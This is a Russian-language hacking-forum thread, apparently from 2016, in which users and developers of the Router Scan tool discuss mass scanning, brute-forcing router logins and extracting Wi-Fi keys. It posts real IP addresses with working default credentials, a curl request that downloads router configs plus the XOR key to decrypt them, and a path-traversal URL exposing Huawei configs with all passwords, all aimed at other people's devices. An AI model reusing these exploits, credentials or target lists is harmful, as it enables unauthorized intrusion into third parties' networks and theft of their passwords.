Просмотр полной версии : прога Router Scan
Киньте кому не трудно, порты для скана в RS, для роутеров. У меня в проге стоят 80, 8080, 1080. Может я что пропустил?
Заходишь на 3wifi в статистику и смотришь порты частоиспользуемые
binarymaster
11.10.2016, 21:58
глянь пожалуйста и QBRы на 161 порту, логин пароль подбирает, но данные не вытаскивает с них. или это только у одного меня так?
Добавил сигнатуры.
а на ZTE, про которые ныл несколькими постами выше, пароль не перебирает, хотя пишет, что admin admin подходит. роутер блочится на 60 сек после трех неправильных вводов. но и даже с верным паролем не парсятся с него данные. к сожалению, открытого снаружи не могу найти пока
Пофиксил.
Felis-Sapiens
11.10.2016, 22:06
Я тут написал скрипт для просмотра конфигурационных файлов с сигнатурой 'COMPCS' (такие, в том числе, и у этих QBR), может кому пригодится:
https://mega.nz/#!qoQGlJwS!ym7dhnElsW4UqW6227Bq2JNb0tzRc92heU7nKFY UxtU
binarymaster, какое количество портов оптимально указать при сканировании за одну сессию? Указал более 10, RS вылетел через 2 минуты (использую последний ваш билд), далее запустил rs с 4 портами, как итог полёт нормальный.
Может это зависит от настроек max.threads и timeout (ms)? Антивирус, фаервол отключены, фильтрации DNS и межсетевые экраны в маршрутизаторе отключены. Канал 100mb/s, пользуюсь им один. Сканирую IP внутренней сетки провайдера (172.xxx.xxx.xxx).
Может предложите наиболее оптимальные настройки исходя из вашего опыта? Спасибо.
binarymaster
13.10.2016, 00:51
binarymaster, какое количество портов оптимально указать при сканировании за одну сессию?
Я иногда гоняю с 5-ю портами 8080,80,1080,443,8443.
Сомневаюсь, что вылеты из-за их количества. Но по возможности проверю. А какие порты указывали вы?
Я иногда гоняю с 5-ю портами 8080,80,1080,443,8443.
Сомневаюсь, что вылеты из-за их количества. Но по возможности проверю. А какие порты указывали вы?
80
8080
443
1080
81
8088
10000
9090
61080
8081
88
13004
1025
8888
8000
8443
82
65080
9999
С количеством явно перебрал Просто я полагал, что процесс тем самым должен замедлиться, что и произошло по факту, это логично, но не думал, что программа закроется.
denlenin
13.10.2016, 05:28
Добавил сигнатуры.
Пофиксил.
Да, эти всё ещё некорректно парсятся. Но сейчас я на работе, пофиксить смогу только вечером, если эти штуки не оффнутся.
так и не нашел открытой снаружи точки
http://rgho.st/7wmzJsYYQ - zte h298n через Charlies
сорри за наглость, но когда примерно ждать следующего релиза со всеми фиксами?
Уважаемые! Подскажите, пожалуйста. Провайдер как-то может увидеть что сканятся айпишники этой прогой? Если я например, грубо говоря, поставлю сканить с 0.0.0.0 по 255.255.255.255 он будет например месяц сканить, где-то это как-то может всплыть? А то придут злые дяди от провайдера или еще кто недовольный, что я им всю сетку забил
Провайдер как-то может увидеть что сканятся айпишники этой прогой?
Вообще ему пох, кроме жалоб.
Если поступит абуза, что с вашей сети идет подозрительный скан портов - провайдер обязан вас отключить.
Или отключат всего провайдера.
binarymaster
13.10.2016, 11:14
С количеством явно перебрал
На некоторых их этих портов могут быть другие службы, работающие по другим протоколам, не HTTP.
так и не нашел открытой снаружи точки
http://rgho.st/7wmzJsYYQ - zte h298n через Charlies
Пофиксил уже.
сорри за наглость, но когда примерно ждать следующего релиза со всеми фиксами?
Ну мне в принципе не лень выкладывать сборки после каждого коммита... это так срочно?
denlenin
13.10.2016, 14:51
Ну мне в принципе не лень выкладывать сборки после каждого коммита... это так срочно?
да не срочно просто боязно, вдруг проект снова заморозится на год ))
binarymaster
13.10.2016, 14:56
да не срочно просто боязно, вдруг проект снова заморозится на год ))
Это вряд ли. Я набрал небольшую команду, и разработка со скрипом, но двинулась с места.
Tenda 11N Wireless Router
http://87.118.142.197:8080
admin:admin
Felis-Sapiens
13.10.2016, 16:00
Tenda 11N Wireless Router
http://87.118.142.197:8080
admin:admin
Поправил
binarymaster
13.10.2016, 21:46
вот по первому сканированию tcp. вроде какие-то порты обнаружились.
Похоже на хост под управлением Windows, но за активным брандмауэром.
Похоже на хост под управлением Windows, но за активным брандмауэром.
вот это-то и непонятно.до того как поговорил с сисадмином роутер парсился свободно роутерсканом. не было никаких активных брандмауэров.да и после разговора железо не менялось. вот и не могу понять, что он сделал :-( подозревал проброс портов. но видимо не то. он, мне кажется, что-то намутил с роутером. но вот что? лазил по настройкам аналогичного роутера и не нашел ничего похожего. а может просто не увидел ввиду пробела в образовании
попробую еще по udp сканированию. может что-то еще подскажет :-(
Похоже на хост под управлением Windows, но за активным брандмауэром.
спасибо за подсказку. взялся за матчасть и кажется что-то начал понимать. роутер ни при чем. ключевое слово - активный боандмауэр теперь вопрос в том, как его обойти, чтобы добраться до роутера и включить вайфай
localhost
15.10.2016, 09:27
binarymaster спасибо что возобновили развитие этой программы =)
есть предложение - имеющийся опция фильтрации хостов, не очень удобная, она позволяет только отсеивать не нужные, а если мне нужно искать конкретные роутеры, то фильтром можно выделить только 1 единственный. Хотелось бы иметь возможность настроить - сначало идет определение устройства всеми возможными способами затем сравнить, его со списком указанных в фильтре, и только после этого начинать его брутить и применять эксплойты ! Это было бы просто здорово =) ! И еще - работа с большими списками хостов, сейчас в прогу можно загрузить не более 10 000 хостов, если сканить 100ни или миллионы хостов, то это не удобно =) Просто я сначало прохожу списки сетей masscanом затем полученый список вставляю в роутер сканер, а в этом списке могут быть миллионы хостов =)
А еще - с нетерпением ждем linux версию ! =) Спасибо!
binarymaster
15.10.2016, 10:49
есть предложение - имеющийся опция фильтрации хостов, не очень удобная, она позволяет только отсеивать не нужные, а если мне нужно искать конкретные роутеры, то фильтром можно выделить только 1 единственный. Хотелось бы иметь возможность настроить - сначало идет определение устройства всеми возможными способами затем сравнить, его со списком указанных в фильтре, и только после этого начинать его брутить и применять эксплойты ! Это было бы просто здорово =)
То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.
И еще - работа с большими списками хостов, сейчас в прогу можно загрузить не более 10 000 хостов
Можно загрузить более 10 000.
Они просто не выводятся в список, вместо этого выводится предупреждение.
localhost
15.10.2016, 11:26
То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.
Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами
Можно загрузить более 10 000.
Они просто не выводятся в список, вместо этого выводится предупреждение.
Попробовал импортировать список из файла, весом немного больше 7мБ, 500 000 хостов, прога зависла в обработке, через 20 мин. убил процесс надоев ждать завершения =( Хотя к примеру notepad++ файл весом в 500мБ (!) открывает всего за несколько секунд )
nmap вообще открывает любой файл без задержек, хоть 5 миллионов хостов =)
binarymaster
15.10.2016, 11:37
Попробовал импортировать список из файла, весом немного больше 7мБ, 500 000 хостов, прога зависла в обработке, через 20 мин. убил процесс надоев ждать завершения =(
Попробуйте не использовать встроенный редактор диапазонов, а открыть файл ranges.txt, отредактировать его, и после запустить RS.
Компоненты Delphi не заточены под большие объёмы текста.
localhost
15.10.2016, 11:53
Попробуйте не использовать встроенный редактор диапазонов, а открыть файл ranges.txt, отредактировать его, и после запустить RS.
Так намного быстрее, спасибо =)
Еще - настройка вывода результатов - сохранять в файл с возможностью выбора столбцов, к примеру я хочу только - ip, port, authorization, device type, при том в каком порядке я укажу в таком они и будут =) + выбор разделителя
Стоить ли ждать linux версию ?
Еще, активируйте пожалуйста меню Rescan\Reset на вкладке Good Results =) а то искать этот ip на вкладке Realtime status, если нужно, просто не реально =)
Замечал иногда пользователи используют пароль от роутера в качестве WPA ключа для wifi, иногда роутер скан может узнать key от роутера, тогда можно зайти на роутер при помощи admin: =)
Ограничение на длинну словаря в RS есть?
binarymaster
15.10.2016, 14:51
Еще - настройка вывода результатов - сохранять в файл с возможностью выбора столбцов, к примеру я хочу только - ip, port, authorization, device type, при том в каком порядке я укажу в таком они и будут =) + выбор разделителя
Такие вещи, пожалуйста, через Excel.
Стоить ли ждать linux версию ?
Определённо.
Еще, активируйте пожалуйста меню Rescan\Reset на вкладке Good Results =) а то искать этот ip на вкладке Realtime status, если нужно, просто не реально =)
Технически невозможно.
Замечал иногда пользователи используют пароль от роутера в качестве WPA ключа для wifi, иногда роутер скан может узнать key от роутера, тогда можно зайти на роутер при помощи admin:<значение key> =)
Эта фича уже используется RS'ом.
Ограничение на длинну словаря в RS есть?
Нет, но чем больше, тем дольше будет перебор => придётся повышать лимиты жизни потоков.
localhost
15.10.2016, 15:25
<div class="quote">
То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.
</div>
Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами
Это тоже можно не ждать ?
binarymaster
15.10.2016, 15:36
Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами
Белый список скорее всего будет. По второй части - сложнее, но тоже возможно.
Информация к размышлению:
Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер.
Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.
VladimirV
15.10.2016, 20:12
Информация к размышлению:
Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер.
Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.
Пару логин и пароль, ввели через таб?
Словарь пар используете тот в который вписали свой логин-пароль?
Пару логин и пароль, ввели через таб?
Словарь пар используете тот в который вписали свой логин-пароль?
Да , TPlink сразу пробивает а Zyxel держиться.
Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер. Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.
FAQ: 2.5.
Q: Я использую функцию Use credentials, и пароль к роутеру подбирается. Но если я её отключаю, и добавляю пару логин/пароль в файлы словарей auth_basic.txt и/или auth_digest.txt, то пароль к роутеру уже не подбирается. Почему так?
A: Скорее всего, ваш роутер не использует Basic/Digest аутентификацию. Для таких роутеров необходимо использовать функцию Use credentials.
binarymaster
15.10.2016, 23:13
A: Скорее всего, ваш роутер не использует Basic/Digest аутентификацию. Для таких роутеров необходимо использовать функцию Use credentials.
ZyXEL Keenetic Giga II (NDMS v2.06(AAFS.2)C0) использует Digest-аутентификацию, тут что-то другое.
ломаеться
держиться
Пожалуйста... не причиняйте боль моим глазам.
Вы пароль свой добавили только в auth_basic, или в оба словаря?
ZyXEL Keenetic Giga II (NDMS v2.06(AAFS.2)C0) использует Digest-аутентификацию, тут что-то другое.
Пожалуйста... не причиняйте боль моим глазам.
Вы пароль свой добавили только в auth_basic, или в оба словаря?
В оба.
роутерскан нашел такую вот штуковину mymon (pass - admin:admin). нагуглил mymon(MySQL-Monitor). но что-то туплю. что это за хр....ь? то, что связано со скулями - понятно. но где применяется это дело, может кто подскажет?
DSL2650NRU
25.10.2016, 00:08
Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin. А если зайти по ip, тогда можно авторизоваться.
Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin. А если зайти по ip, тогда можно авторизоваться.
Ты давай айпи , а мастера если получится то допилят ...По конкретней плис
DSL2650NRU
25.10.2016, 08:19
Ты давай айпи , а мастера если получится то допилят ...По конкретней плис
100.98.181.150 100.98.90.104 Это локалка ростелекома.
Felis-Sapiens
25.10.2016, 10:17
100.98.181.150 100.98.90.104 Это локалка ростелекома.
Ну и толку от них? Прочтите раздел справки "Добавление новых устройств в поддержку".
Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin
Добавил, но не факт что те, которые вы просили.
binarymaster
26.10.2016, 21:51
Я посмотрел - из под user:user можно скачать конфиг. Для этого логинимся под user:user и отправляем POST-запрос, например в curl:
curl "http://IP:PORT/cfg_op.ccp" --data "ccp_act=save" > cfg.bin
Конфиг зашифрован, если так можно выразиться. Скачав прошивку, нашёл, что это просто xor с 0xABCD1234
Добавил эксплойт в RS.
Вечер добрый. Вот здесь https://forum.antichat.ru/threads/398971/page-119#post-4000872 писали про ZTE. А можно как нибудь новую версию получить. А то наткнулся сегодня на них. И кстати пароли у них support:support
http://image.prntscr.com/image/ea350d0b42794c0eb8659c2e1e5d7650.png
readiv собака mail.ru
binarymaster
27.10.2016, 01:14
А можно как нибудь новую версию получить. А то наткнулся сегодня на них.
http://rgho.st/7MH9X2KPy
Пароль - название форума.
Не работает
http://image.prntscr.com/image/bc52197a4ee24c759220e3534784e843.png
У того что admin:admin на самом деле пароль support:support и WiFi на нем есть
Вот список в иекстовом виде
212.106.224.163
212.106.225.190
212.106.237.182
212.106.241.175
212.106.243.77
212.106.252.176
95.22.24.109
95.22.31.20
95.22.31.153
95.22.37.114
95.22.55.79
95.22.62.244
95.22.149.49
95.22.151.44
95.22.160.45
95.22.162.231
95.22.166.6
denlenin
27.10.2016, 05:27
http://rgho.st/7MH9X2KPy
Пароль - название форума.
вот спасибо! qtech qbr победили! с ZTE проблему подтверждаю. вычитывается только название устройства
http://image.prntscr.com/image/def991d870c447cb830ff7a66514ef55.jpg
http://rgho.st/7MH9X2KPy
Пароль - название форума.
А можно на другой файлообменник скинуть?
CRACK211
27.10.2016, 11:26
на роутерах Thomson Router стоят такие пароли adfabfa7ca09378c4b769466b7 ? или это зашифрованный пароль? хеш или еще что?
VladimirV
27.10.2016, 11:27
на роутерах Thomson Router стоят такие пароли adfabfa7ca09378c4b769466b7 ? или это зашифрованный пароль? хеш или еще что?
Это пароли.
binarymaster
27.10.2016, 11:39
У того что admin:admin на самом деле пароль support:support и WiFi на нем есть
Используйте "Use credentials".
Он после нескольких попыток авторизации блокируется.
с ZTE проблему подтверждаю. вычитывается только название устройства
У них есть что-то ещё? На тех ZTE, к которым у меня был доступ, беспроводного адаптера не было.
Сейчас я на работе, смогу посмотреть лишь вечером.
А можно на другой файлообменник скинуть?
Можно, но зачем?
binarymaster
27.10.2016, 14:39
C "Use credentials" все равно не вычитывает
Но авторизуется. Уже понял.
denlenin
27.10.2016, 16:51
У них есть что-то ещё? На тех ZTE, к которым у меня был доступ, беспроводного адаптера не было.
есть там всё-всё-всё. тут выкладывал слепок через charlies
Можно, но зачем?
Уже незачем. Просто с утра не смог скачать, видимо у них сервис подвис. Как то так.
binarymaster
27.10.2016, 22:10
У того что admin:admin на самом деле пароль support:support и WiFi на нем есть
Пофиксил. Теперь и support:support пробует, и инфу достаёт.
А можно пофикшеную как нибудь получить?
binarymaster
28.10.2016, 01:19
А можно пофикшеную как нибудь получить?
Как-нибудь.
http://rgho.st/8ntTt5Jlp
denlenin
28.10.2016, 05:20
Пофиксил. Теперь и support:support пробует, и инфу достаёт.
вот спасибище! заработало. только как-то подозрительно долго инфа из ZTE вытягивается и перебор паролей стал долго происходить на qbr или мне кажется?
в предыдущих билдах прям отлетало, а тут при 80ти потоках - 40-50 постоянно висят в getting info и трай то логин (сканю локалку с qbr и zte).
о! попробовать пароли в файле повыше поставить, роутер скан же не радномно их перебирает?
upd разобрался, отсортировал пароли как надо в файлах - процесс ускорился в разы
40-50 постоянно висят в getting info и трай то логин
Было один раз похожее в какой-то из первых новых тестовых версий. При первом сканировании всё было без запинок. Залив насканированное на 3wifi не отходя от кассы взялся сканировать другой диапазон (закрыв и открыв рскан заново) и рскан начал почему-то застревать на некоторых роутерах. При паузе данные с роутеров нормально допарсивались, но после возобновления сканирования всё равно появлялись новые "тормознутые" которые часто выдавали timed out и не ресканились пока снова не поставишь на паузу. Подозреваю, что дело было в том, что моя машина была подключена к сети через wi-fi, либо проблема была в самом диапазоне
CRACK211
29.10.2016, 11:50
Есть роутер dir-615 у него две учетные записи user и Admin при сканировании rs показывает пароль от user, точнее пароля на user нету, но rs все показывает. А для admin даже не пытается найти пароль.Вопрос нельзя сделать что бы rs искал пароль и от admin?
Triton_Mgn
29.10.2016, 13:05
Как-нибудь.
http://rgho.st/8ntTt5Jlp
A то, что Felis-Sapiens в последнее время добавлял и фиксил в этой версии присутствует?
binarymaster
29.10.2016, 14:42
Есть роутер dir-615 у него две учетные записи user и Admin при сканировании rs показывает пароль от user, точнее пароля на user нету, но rs все показывает. А для admin даже не пытается найти пароль.Вопрос нельзя сделать что бы rs искал пароль и от admin?
Пункт FAQ 2.6.
A то, что Felis-Sapiens в последнее время добавлял и фиксил в этой версии присутствует?
Да.
tamer010151
02.11.2016, 01:51
http://rgho.st/8ymVBSpyl
tamer010151
02.11.2016, 01:54
http://store2.up-00.com/2016-11/1478037077531.jpg
binarymaster
02.11.2016, 11:13
@tamer010151 (https://forum.antichat.xyz/members/266514/) ну и зачем все модули сканирования включать? Боитесь что-то пропустить?
А ещё - версия на скриншоте определённо устарела, ZTE я исправлял.
определённо устарела, ZTE я исправлял.
Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается.
зачем все модули сканирования включать?
Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.
binarymaster
02.11.2016, 11:23
Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается.
Ну вот у меня например 197.164.81.40 хоть и не логинится, но крякозябр в таблицу не пишет.
Ещё обратил внимание, что диапазон в целом тормозной, ширина канала очень мала на стороне сканируемого провайдера. Таким большим количеством потоков его нельзя сканировать, можно вообще положить.
binarymaster, заметил что ZTE Router (locked for 59 sec.) а пароль подбирается дальше и другие уязвимости проверяются.
VladimirV
02.11.2016, 11:45
ну и зачем все модули сканирования включать? Боитесь что-то пропустить?
Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.
Там еще два RS запущено.
У меня тут нарисовалась огромная куча Huawei. Предположительно это HG532e. По нему вот нашлось https://github.com/ud2/advisories/tree/master/embedded/huawei/cve-2015-7254
За пару минут нашел кучу устройств с открытым 37215. Это можно как то эксплуатировать?
http://image.prntscr.com/image/60406f1048824fc5bfca951565507232.png
Felis-Sapiens
03.11.2016, 16:57
Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д.
Интересно от чего зависит наличие /var/curcfg.xml. Я раньше сколько ни пробовал, /etc/inittab скачивается, а curcfg.xml нет.
localhost
03.11.2016, 18:23
binarymaster а фильтрация по правилам "белого" списка будет ?
binarymaster
03.11.2016, 22:27
binarymaster а фильтрация по правилам "белого" списка будет ?
https://forum.antichat.ru/posts/4002151
RSTest.7z (1.3 МБ)
Загружен 9 дней наза
Файл удален
Можно перезолить?
binarymaster
04.11.2016, 14:46
RSTest.7z (1.3 МБ)
Загружен 9 дней наза
Файл удален
Можно перезолить?
???
https://forum.antichat.ru/posts/4006682
http://images.vfl.ru/ii/1478328329/03eeb2d0/14810984_m.png
http://images.vfl.ru/ii/1478329638/69baced1/14811118_m.png
Обратил внимание нет авторизации и MAC , делал рескан, так же без результата .
binarymaster
05.11.2016, 15:36
Обратил внимание нет авторизации и MAC , делал рескан, так же без результата .
Это нормально. Эксплойт смог добыть данные точки доступа, но доступа к BSSID при таком раскладе нет.
RS всегда добывает то, что способен добыть. Посылая подобные скриншоты, предже всего задавайте себе вопрос "А должен ли RS добыть что-то ещё? Если да, каким образом?"
На второй вопрос ответ должен быть чисто техническим, в виде алгоритма получения данных, а также проверенным лично.
Стоит ли надеяться на реализацию https://forum.antichat.ru/threads/398971/page-122#post-4008991 ?
Отвечаю сам себе. Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д.
Как вы прикручиваете этот скрипт к RouterScan?
Никак. Если уважаемый binarymaster добавит его в RS, тогда будет можно. А пока можете сами поупражняться в программировании на python
CRACK211
06.11.2016, 00:27
http://anticlerk.ru/wp-content/uploads/2013/06/%D0%AF-%D1%82%D0%B0%D0%BA-%D0%B4%D1%83%D0%BC%D0%B0%D1%8E.jpg
Как после сканирования, сохранить отдельно только пароли ???
Отключить отображение ненужных столбцов bssid, essid, wps pin, ip и т.п. Перейти в good resultat и сохранить в файл. Main menu => choose settings и убирайте не нужные столбцы
А можно маленькое изменение в интерфейсе?
Что бы в закладке "Good Results", сочетание +R (рескан) тоже работало?
Часто бывает, что нужно из гудов пересканировать(завис роутер например, с таймаутом), а приходится лезть и искать его в закладке "RealTime Stats"...
Неудобно однако.
Ответ на Ваш вопрос https://forum.antichat.ru/threads/398971/page-71#post-3910839
binarymaster
12.11.2016, 15:35
Но хотя бы сделать поиск ip из good в RealTime можно?
А вот это кстати да, хорошая мысль. Единственное НО: записи могут повторяться, причём полностью.
А вот это кстати да, хорошая мысль. Единственное НО: записи могут повторяться, причём полностью.
На наш страх и риск. Оружейник не виноват в том, что его ножом, ревнивый муж зарезал супругу на кухне.
Мне кажется, что если учитывать в выборке фильтр по пингу, вероятность дубля будет сведена к минимуму.
Доброго времени суток..
Простите за вопрос. А куда добавлять сканы?
Позабыла совсем адрес. Раньше добавляла, потом бросила.Хочу продолжать, а куда - подскажите пожалуйста!!!
Заранее благодарна!
Доброго времени суток..
Простите за вопрос. А куда добавлять сканы?
Позабыла совсем адрес. Раньше добавляла, потом бросила.Хочу продолжать, а куда - подскажите пожалуйста!!!
Заранее благодарна!
http://3wifi.stascorp.com/
А еще я прошу прощения, а сайт лежит,да?
И, еще столкнулась с такой проблемой, что не работает программа. Запускаю, а кнопки не реагируют. Это версия 2.53.
Может, спуститься на 2.52?
Triton_Mgn
14.11.2016, 14:12
А еще я прошу прощения, а сайт лежит,да?
И, еще столкнулась с такой проблемой, что не работает программа. Запускаю, а кнопки не реагируют. Это версия 2.53.
Может, спуститься на 2.52?
Скачать заново архив с сайта stascorp.com и распаковать.
erwerr2321
14.11.2016, 14:17
А еще я прошу прощения, а сайт лежит,да?
Какой сайт? Нет! У нас всё стоит и работает!
vince666999
14.11.2016, 16:31
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp
на архиве пароль, где его взять? Прога платная?
Спасибо
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp
на архиве пароль, где его взять? Прога платная?
Спасибо
Пароль - название форума.
erwerr2321
14.11.2016, 16:37
Пароль - название форума.
Ну зачеееем????
henri2002
14.11.2016, 16:48
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp
на архиве пароль, где его взять? Прога платная?
Спасибо
если не знаете, может оно вам не надо.
не могу скачать ни в хроме, ибо http://prntscr.com/d75prv
не могу скачать в эксплорере, ибо http://prntscr.com/d75q72
А ведь так не должно быть на свете!
Можно в личку ссылку на файлообменник, пожалуйста!!!
binarymaster
14.11.2016, 19:20
не могу скачать ни в хроме, ибо http://prntscr.com/d75prv
не могу скачать в эксплорере, ибо http://prntscr.com/d75q72
А ведь так не должно быть на свете!
Можно в личку ссылку на файлообменник, пожалуйста!!!
Боже мой... и это я вижу здесь, на Античате.
Во-первых, IE качать Роутер Скан не желательно. Вообще не желательно им что-либо качать, он часто недокачивает.
Во-вторых, у Chrome помимо "Отменить передачу" есть стрелочка правее. Немного лосьона для прямости рук™, и хром не сможет помешать вам в скачивании файла.
како грубо, однако....
http://prntscr.com/d764jz
http://prntscr.com/d7651z
грубо, однако....
не нужно оно вам.
если вы в хроме не можете на отдельной вкладке довести скачивание до результата, значит не зря спрятали.
како грубо, однако....
http://prntscr.com/d764jz
http://prntscr.com/d7651z
- попробуй в Хроме: Настройки - Показать дополнительные настройки - Защитить устройство от опасных сайтов (снять флажок).
binarymaster
14.11.2016, 22:03
како грубо, однако....
http://prntscr.com/d764jz
http://prntscr.com/d7651z
Это я ещё вежливо ответил, можно сказать, с иронией. Раньше там же был пункт меню "Разрешить загрузку".
Я обычно через Ctrl+J иду в список загрузок и там разрешаю вручную.
Настройки - Показать дополнительные настройки - Защитить устройство от опасных сайтов (снять флажок)
Про галку не знал, спасибо.
Про галку не знал, спасибо.
- век живи век учись...
- что же вы так грубо с девушкой, тем более с начинающим "хакером"? она бедная только через ТОР скачала.
вовсе не надо так!
Вы сами сказали - "век живи- век учись".
Так что я научилась)))
Ну не получилось нормально, нет лосьона))))
Бывает!
- век живи век учись...
- что же вы так грубо с девушкой, тем более с начинающим "хакером"? она бедная только через ТОР скачала.
а мне кажется - правильно.расшаркиваться перед дамой можно в салунах. а если она полезла в воду, не зная броду - то тут не важно девушка или типа пацан такие "начинающие хакеры" уже добились того, что провайдеры что-то подозрительно сильно возбудились
вовсе не надо так!
Вы сами сказали - "век живи- век учись".
Так что я научилась)))
Ну не получилось нормально, нет лосьона))))
Бывает!
пользуйтесь лисой.меньше проблем будет.и таких вопросов
пользуйтесь лисой.меньше проблем будет.и таких вопросов
- каждый браузер нужно чуть-чуть поднастроить.
а мне кажется - правильно.расшаркиваться перед дамой можно в салунах. а если она полезла в воду, не зная броду - то тут не важно девушка или типа пацан такие "начинающие хакеры" уже добились того, что провайдеры что-то подозрительно сильно возбудились
- можно было и в ГУГЛ послать а не грубить, дженпельмени.
ой все!
- лиса он имеет ввиду Mozilla Firefox...браузер такой тоже есть.
я не начинающий(((
Просто была под другим ником тут.
Очень давно уже добавляю инфу в базу.
А что тут ... промахнулась - бывает. Невозможно знать все.
Про расшаркивания - речь не шла. Сами не все знаете.
Можно нормально помочь. Но, видимо.. сложно)
Что ж.
я не начинающий(((
Просто была под другим ником тут.
Случаем не под этим?
pestoviv, он же Vasiliy37, он же Arnold1024
Или сосед?
- можно было и в ГУГЛ послать а не грубить, дженпельмени.
вы считаете, что послать.....по гуглу - это тактичнее ?
vince666999
14.11.2016, 22:44
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp
на архиве пароль, где его взять? Прога платная?
Спасибо
Пароль - название форума.
СПАСИБО!
я не начинающий(((
Просто была под другим ником тут.
Очень давно уже добавляю инфу в базу.
А что тут ... промахнулась - бывает. Невозможно знать все.
Про расшаркивания - речь не шла. Сами не все знаете.
Можно нормально помочь. Но, видимо.. сложно)
Что ж.
не нужно обижаться.мужской половине свойственна агрессивная воинственность природа, знаете-ли
Может и не девушка, вовсе?
доказательства в студию
vince666999
14.11.2016, 22:51
Ну зачеееем????
вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)
форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...
Спасибо всем, его наполняющим))
вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)
форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...
Спасибо всем, его наполняющим))
Да нет речи о жадности, здесь речь о человеческой лени и невнимательности.
Если почитать тему сначала, то станет понятно.
вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)
форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...
Спасибо всем, его наполняющим))
вопрос не в жадности, а внимательности. помощь - помощи тоже рознь. одно дело помочь в существенных вопросах, и другое дело тыкать пальцем в очевидное
vince666999
14.11.2016, 22:57
Мы знаем, 'Пятница'
Народу набежало....
это ж хорошо что народ есть)
про жадность естественно юмор это такой
binarymaster
14.11.2016, 23:44
- можно было и в ГУГЛ послать а не грубить, дженпельмени.
не нужно обижаться.мужской половине свойственна агрессивная воинственность природа, знаете-ли
Вообще хакер - существо бесполое. Да и знакомств здесь никто не ищет, мы все здесь по делу.
эт точно))) знакомств не ищу.
Была под ником paulo.
Но, он поменял пароль.. простите - оно, и пришлось региться)))
А ведь несколько лет была pauloM))) Эх.
Ну,то такое
Я правильно понимаю, когда я загружаю так, то я на самом сайте свою ж статистику посмотреть не могу?( http://prntscr.com/d7gp88
Хотя, не особо важно. Просто лепты в дело.
binarymaster
15.11.2016, 13:20
Была под ником paulo.
Догадывался.
Я правильно понимаю, когда я загружаю так, то я на самом сайте свою ж статистику посмотреть не могу?( http://prntscr.com/d7gp88
Да, совершенно верно, выгрузка из RS не привязывает к аккаунту. Пока только через загрузку с сайта.
Thomson Router, firmware: STB3.01.38 пароль определяет, а вот данные не считывает
84.236.212.144:8080 :admin
Felis-Sapiens
15.11.2016, 20:09
Thomson Router, firmware: STB3.01.38 пароль определяет, а вот данные не считывает
Добавил.
Добавил.
А нет никакой постоянной ссылки, что бы каждый раз не выпрашивать обновления?
А как получить актуальную версию?
henri2002
21.11.2016, 21:17
А как получить актуальную версию?
лежит в этой теме.
лежит в этой теме.
Если Вы о том, который был загружен 25 дней назад, то после этого уже были добавления.
binarymaster
21.11.2016, 22:08
А как получить актуальную версию?
после этого уже были добавления.
http://rgho.st/8wXLL9n8j
http://rgho.st/8wXLL9n8j
Премного благодарен!
Felis-Sapiens
21.11.2016, 23:07
Там в пине нули лидирующие отсутствуют.
Если б только в пине, там число цифр известно. А как быть с числовыми паролями? Не известно, были там нули спереди или нет.
localhost
23.11.2016, 19:41
http://rgho.st/8wXLL9n8j
пароль какой и почему браузер ругается что сайт поддельный ?
henri2002
23.11.2016, 19:51
пароль какой и почему браузер ругается что сайт поддельный ?
славянский шкаф, и осторожно там вирус, ваш пароль стырят.
carartem02
24.11.2016, 00:34
славянский шкаф, и осторожно там вирус, ваш пароль стырят.
Я перешел, скачал, запустил и вот от провайдера прилетела жалоба, мол какие-то странные запросы и вы скорее всего в сети ботнета...
-Predator-
24.11.2016, 20:13
Я перешел, скачал, запустил и вот от провайдера прилетела жалоба, мол какие-то странные запросы и вы скорее всего в сети ботнета...
И часто Вам провайдер жалобы пишет? Скан выложите?
Triton_Mgn
24.11.2016, 20:18
И часто Вам провайдер жалобы пишет? Скан выложите?
После славянского шкафа не часто)) А причем газета. билет три вопрос 1.
пароль какой и почему браузер ругается что сайт поддельный ?
Вероятно потому что в блек-листе, ну и потому что http а не https, обмен клиент-сервер не шифруется.
